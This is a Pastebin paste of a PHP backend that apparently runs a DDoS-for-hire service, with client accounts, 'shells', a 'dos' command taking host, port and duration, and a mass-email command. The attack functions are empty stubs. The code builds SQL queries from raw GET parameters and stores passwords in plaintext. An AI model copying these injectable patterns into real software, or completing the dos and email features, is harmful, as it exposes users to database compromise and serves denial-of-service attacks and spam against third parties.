SHARE
TWEET

Untitled

a guest Jun 4th, 2017 68 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. //configuration
  4. class Config {
  5.     public static $mysql_user = "ilia";
  6.     public static $mysql_pass = "pass";
  7.     public static $mysql_server = "localhost";
  8.     public static $mysql_database = "ilia";
  9.     public static $mysql_table_prefix = "";
  10. }
  11.  
  12. //error response codes
  13. class ErrorCode {
  14.  
  15.     /*
  16.     public static $MISSING_PARAMETERS = 1;
  17.     public static $AUTHENTICATION_FAILED = 2;
  18.     public static $USER_NOT_FOUND = 3;
  19.     public static $LOGIN_FAILED = 4;
  20.     public static $ACCESS_DENIED = 5;
  21.     public static $INVALID_COMMAND = 6;
  22.      */
  23.  
  24.     public static $MISSING_PARAMETERS = "missing params";
  25.     public static $AUTHENTICATION_FAILED = "authentication failed";
  26.     public static $USER_NOT_FOUND = "user not found";
  27.     public static $LOGIN_FAILED = "login failed";
  28.     public static $ACCESS_DENIED = "access denied";
  29.     public static $INVALID_COMMAND = "invalid command";
  30.    
  31. }
  32.  
  33. class ServletInterface {
  34.     public static function dos($host, $port, $shells, $time){
  35.         echo "dossing now!";
  36.     }
  37.  
  38.     public static function email($to, $from, $email, $subject, $message){
  39.         echo "sending email!";
  40.     }
  41. }
  42.  
  43. class Session {
  44.  
  45.     //stores all the user info
  46.     private $user = array();
  47.  
  48.     //user info is loaded in the constructor
  49.     public function __construct() {
  50.         //make sure the user parameter is set
  51.         Util::isset_m('user');
  52.  
  53.         $this->user = Mysql::getUserRow($_GET['user']);
  54.         //make sure user exists
  55.         if($this->user == null) {
  56.             Util::error(ErrorCode::$USER_NOT_FOUND);
  57.         }
  58.     }
  59.  
  60.     //login function
  61.     public function login() {
  62.        
  63.         //make sure the pass is set
  64.         Util::isset_m('pass');
  65.  
  66.         if($this->user['pass'] == $_GET['pass']) {
  67.             //update the database
  68.             $this->user['id'] = Util::random_str(20);
  69.             $this->user['ip'] = $_SERVER['REMOTE_ADDR'];
  70.             $this->user['time'] = time();
  71.             Mysql::setSession($this->user['name'], $this->user['id'], $this->user['time'], $this->user['ip']);
  72.             //echo out all the info
  73.             Util::report_info($this->user);
  74.         }else {
  75.             Util::error(ErrorCode::$LOGIN_FAILED);
  76.         }
  77.     }
  78.  
  79.     //clear the session id
  80.     public function logout() {
  81.         Mysql::clearSession($this->user['name']);
  82.     }
  83.  
  84.     //output account info
  85.     public function getAccountInfo() {
  86.         Util::report_info($this->user);
  87.     }
  88.  
  89.     //check if the session id is correct
  90.     public function checkId() {
  91.         Util::isset_m('session_id');
  92.         if($this->user['id'] != $_GET['session_id']) {
  93.             Util::error(ErrorCode::$AUTHENTICATION_FAILED);
  94.         }
  95.     }
  96.  
  97.     //make sure the user is admin
  98.     public function checkAdmin() {
  99.         if($this->user['type'] != "admin") {
  100.             Util::error(ErrorCode::$ACCESS_DENIED);
  101.         }
  102.     }
  103.  
  104.     //lock the account
  105.     public function lockAccount() {
  106.         Mysql::setStatus($this->user['name'], "locked");
  107.     }
  108.  
  109.     //unlock the account
  110.     public function unlockAccount() {
  111.         Mysql::setStatus($this->user['name'], "active");
  112.     }
  113. }
  114.  
  115. class Mysql {
  116.     private static $con = null;
  117.     // Connect to the mysql database.
  118.     public static function connect() {
  119.         self::$con = @mysql_connect(Config::$mysql_server, Config::$mysql_user, Config::$mysql_pass);
  120.         if(!self::$con){
  121.             echo "SERVER MYSQL CONNECTION ERROR";
  122.             exit(0);
  123.         }
  124.         mysql_select_db(Config::$mysql_database, self::$con);
  125.     }
  126.  
  127.     // Disconnect from the mysql database.
  128.     public static function disconnect() {
  129.         if(self::$con) {
  130.             mysql_close(self::$con);
  131.         }
  132.     }
  133.  
  134.     // Create a user into the mysql user table.
  135.     public static function createUser($user, $pass, $account_type, $extra_info) {
  136.         $time = time();
  137.         $query = "INSERT INTO " . Config::$mysql_table_prefix . "clients (user, pass, session_id, session_timeout, session_ip, account_status, active_shells, account_type, extra_info) VALUES ('$user', '$pass', '0', '$time' , '0', 'active', '0', '$account_type', '$extra_info');";
  138.         mysql_query($query);
  139.     }
  140.  
  141.     //set the session information
  142.     public static function setSession($user, $session_id, $session_time, $session_ip) {
  143.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '$session_id',  session_ip = '$session_ip', session_timeout = '$session_time' WHERE user = '$user'";
  144.         mysql_query($query);
  145.     }
  146.  
  147.     //clear the session information
  148.     public static function clearSession($user) {
  149.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '0', session_timeout = '0' WHERE user = '$user'";
  150.         mysql_query($query);
  151.     }
  152.  
  153.  
  154.     //get the user's info and return it as an array
  155.     public static function getUserRow($user) {
  156.         $query = "SELECT * FROM " . Config::$mysql_table_prefix . "clients WHERE user = '$user' LIMIT 1;";
  157.         $result = mysql_query($query);
  158.         $user = array();
  159.         if(mysql_num_rows($result) == 1) {
  160.             $resultArray = mysql_fetch_array($result);
  161.             $user['name'] = $resultArray['user'];
  162.             $user['ip'] = $resultArray['session_ip'];
  163.             $user['id'] = $resultArray['session_id'];
  164.             $user['time'] = $resultArray['session_timeout'];
  165.             $user['status'] = $resultArray['account_status'];
  166.             $user['shells'] = $resultArray['active_shells'];
  167.             $user['type'] = $resultArray['account_type'];
  168.             $user['pass'] = $resultArray['pass'];
  169.             $user['info'] = $resultArray['extra_info'];
  170.         }else {
  171.             $user = null;
  172.         }
  173.         return $user;
  174.     }
  175.  
  176.     //return the number of shells
  177.     public static function getShellCount() {
  178.         $query = "SELECT COUNT(*) FROM " . Config::$mysql_table_prefix . "shells";
  179.         return mysql_query($query);
  180.     }
  181.  
  182.     //set the user account status
  183.     public static function setStatus($u, $status) {
  184.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET account_status = '$status' WHERE user = '$u' LIMIT 1;";
  185.         mysql_query($query);
  186.     }
  187. }
  188.  
  189. class Util {
  190.     //make sure parameters are set
  191.     public static function isset_m(/*...*/) {
  192.         $params = func_get_args();
  193.         foreach($params as $param) {
  194.             if(!isset($_GET[$param])) {
  195.                 self::error(ErrorCode::$MISSING_PARAMETERS);
  196.             }
  197.         }
  198.     }
  199.  
  200.     //create a random string
  201.     public static function random_str($length) {
  202.         $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
  203.         $len = strlen($characters);
  204.         $rand = "";
  205.         for ($i = 0; $i < $length; $i++) {
  206.             $rand .= $characters[mt_rand(0, $len - 1)];
  207.         }
  208.         return $rand;
  209.     }
  210.  
  211.     //report error
  212.     public static function error($msg) {
  213.         echo "<error> $msg </error>";
  214.         Mysql::disconnect();
  215.         exit(0);
  216.     }
  217.  
  218.     //report success
  219.     public static function success($msg) {
  220.         echo "<success> $msg </success>";
  221.         Mysql::disconnect();
  222.         exit(0);
  223.     }
  224.  
  225.     //display account info as xml
  226.     public static function report_info($user) {
  227.         $total_shells = Mysql::getShellCount();
  228.         $info = "<account>\n";
  229.         $info .= "  <session_id>" . $user['id'] . "</session_id>\n";
  230.         $info .= "  <total_shells>" . $total_shells . "</total_shells>\n";
  231.         $info .= "  <active_shells>" . $user['shells'] . "</active_shells>\n";
  232.         $info .= "  <account_status>" .$user['status'] . "</account_status>\n";
  233.         $info .= "  <account_type>" . $user['type'] . "</account_type>\n";
  234.         $info .= "</account>";
  235.         echo $info;
  236.  
  237.         Mysql::disconnect();
  238.         exit(0);
  239.     }
  240.  
  241.     //display errors
  242.     public static function show_errors() {
  243.         error_reporting(E_ALL);
  244.         ini_set('display_errors', '1');
  245.     }
  246.  
  247.     //hide errors
  248.     public static function hide_errors() {
  249.         error_reporting(E_COMPILE_ERROR);
  250.         ini_set('display_errors', '0');
  251.     }
  252. }
  253.  
  254. //display all php errors
  255. Util::show_errors();
  256.  
  257. //connect to mysql
  258. Mysql::connect();
  259.  
  260. //create the user session
  261. $session = new Session();
  262.  
  263. //make sure there is a command
  264. Util::isset_m('cmd');
  265.  
  266. //authenticate
  267. if($_GET['cmd'] == "login") {
  268.     $session->login();
  269. }else{
  270.     $session->checkId();
  271. }
  272.  
  273. //parse the commands
  274. switch ($_GET['cmd']) {
  275.     case "logout":
  276.         $session->logout();
  277.         Util::success("Logout Successful");
  278.         break;
  279.     case "dos":
  280.         Util::isset_m('host','port','time','shells');
  281.         ServletInterface::dos($_GET['hot'], $_GET['port'], $_GET['shells'], $_GET['time']);
  282.         break;
  283.     case "unlock_account":
  284.         $session->checkAdmin();
  285.         $session->unlockAccount();
  286.         Util::success("Account Unlocked");
  287.         break;
  288.     case "lock_account":
  289.         $session->checkAdmin();
  290.         $session->lockAccount();
  291.         Util::success("Account Locked");
  292.         break;
  293.     case "create_user":
  294.         $session->checkAdmin();
  295.         Util::isset_m('n_user','n_pass','n_type','n_info');
  296.         Mysql::createUser($_GET['n_user'], $_GET['n_pass'], $_GET['n_type'], $_GET['n_info']);
  297.         Util::success("User Created");
  298.         break;
  299.     case "send_email":
  300.         Util::isset_m('to','from','email','subject','message');
  301.         ServletInterface::email($_GET['to'], $_GET['from'], $_GET['email'], $_GET['subject'], $_GET['message']);
  302.     case "account_info":
  303.         $session->getAccountInfo();
  304.     default:
  305.         Util::error(ErrorCode::$INVALID_COMMAND);
  306.         break;
  307. }
  308.  
  309. Mysql::disconnect();
  310.  
  311. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top